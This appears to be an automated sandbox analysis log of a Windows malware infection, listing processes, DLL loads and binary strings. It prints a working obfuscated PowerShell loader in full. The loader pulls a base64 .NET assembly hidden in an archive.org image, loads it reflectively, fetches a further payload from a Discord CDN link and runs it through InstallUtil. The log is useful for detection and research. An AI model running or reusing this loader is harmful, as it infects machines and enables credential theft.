? aQBl? ? ? ? G4? ? ? ? d? ? ? ? ? ? ? ? 7? ? ? ? CQ? ? ? ? aQBt? ? ? ? GE? ? ? ? ZwBl? ? ? ? EI? ? ? ? eQB0? ? ? ? GU? ? ? ? cw? ? ? ? g? ? ? ? D0? ? ? ? I? ? ? ? ? ? ? ? k? ? ? ? Hc? ? ? ? ZQBi? ? ? ? EM? ? ? ? b? ? ? ? Bp? ? ? ? GU? ? ? ? bgB0? ? ? ? C4? ? ? ? R? ? ? ? Bv? ? ? ? Hc? ? ? ? bgBs? ? ? ? G8? ? ? ? YQBk? ? ? ? EQ? ? ? ? YQB0? ? ? ? GE? ? ? ? K? ? ? ? ? ? ? ? k? ? ? ? Gk? ? ? ? bQBh? ? ? ? Gc? ? ? ? ZQBV? ? ? ? HI? ? ? ? b? ? ? ? ? ? ? ? p? ? ? ? Ds? ? ? ? J? ? ? ? Bp? ? ? ? G0? ? ? ? YQBn? ? ? ? GU? ? ? ? V? ? ? ? Bl? ? ? ? Hg? ? ? ? d? ? ? ? ? ? ? ? g? ? ? ? D0? ? ? ? I? ? ? ? Bb? ? ? ? FM? ? ? ? eQBz? ? ? ? HQ? ? ? ? ZQBt? ? ? ? C4? ? ? ? 
V? ? ? ? Bl? ? ? ? Hg? ? ? ? d? ? ? ? ? ? ? ? u? ? ? ? EU? ? ? ? bgBj? ? ? ? G8? ? ? ? Z? ? ? ? Bp? ? ? ? G4? ? ? ? ZwBd? ? ? ? Do? ? ? ? OgBV? ? ? ? FQ? ? ? ? Rg? ? ? ? 4? ? ? ? C4? ? ? ? RwBl? ? ? ? HQ? ? ? ? UwB0? ? ? ? HI? ? ? ? aQBu? ? ? ? Gc? ? ? ? K? ? ? ? ? ? ? ? k? ? ? ? Gk? ? ? ? bQBh? ? ? ? Gc? ? ? ? ZQBC? ? ? ? Hk? ? ? ? d? ? ? ? Bl? ? ? ? HM? ? ? ? KQ? ? ? ? 7? ? ? ? CQ? ? ? ? cwB0? ? ? ? GE? ? ? ? cgB0? ? ? ? EY? ? ? ? b? ? ? ? Bh? ? ? ? Gc? ? ? ? I? ? ? ? ? ? ? ? 9? ? ? ? C? ? ? ? ? ? ? ? Jw? ? ? ? 8? ? ? ? Dw? ? ? ? QgBB? ? ? ? FM? ? ? ? RQ? ? ? ? 2? ? ? ? DQ? ? ? ? XwBT? ? ? ? FQ? ? ? ? QQBS? ? ? ? FQ? ? ? ? Pg? ? ? ? +? ? ? ? Cc? ? ? ? Ow? ? ? ? k? ? ? ? GU? ? ? ? bgBk? ? ? ? EY? ? ? ? b? ? ? ? Bh? ? ? ? Gc? ? ? ? I? ? ? ? ? ? ? ? 9? ? ? ? C? ? ? ? ? ? ? ? Jw? ? ? ? 8? ? ? ? Dw? ? ? ? QgBB?
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('&f815e5fb749106f21729c58ee9d5d4362f113d9dbc69e72e0b64b3c04c574c1d=mh&03aacc66=si&0bbfdc66=xe?txt.GIRO/9282559141872667721/9547513900813347721/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , '1' , 'C:\ProgramData\' , 'padral','InstallUtil','desativado'))"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C copy *.js "C:\ProgramData\padral.js"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: jscript.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: mlang.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: edputil.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: slc.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sppc.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: edputil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: rasapi32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: rasman.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: rtutils.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: vaultcli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: wintypes.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: secur32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: schannel.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: mskeyprotect.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: ntasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: ncryptsslp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: msasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: D:\New Private Panell Src 3.0\Rump Updated FIX C#\src\obj\Debug\dnlib.pdbX source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
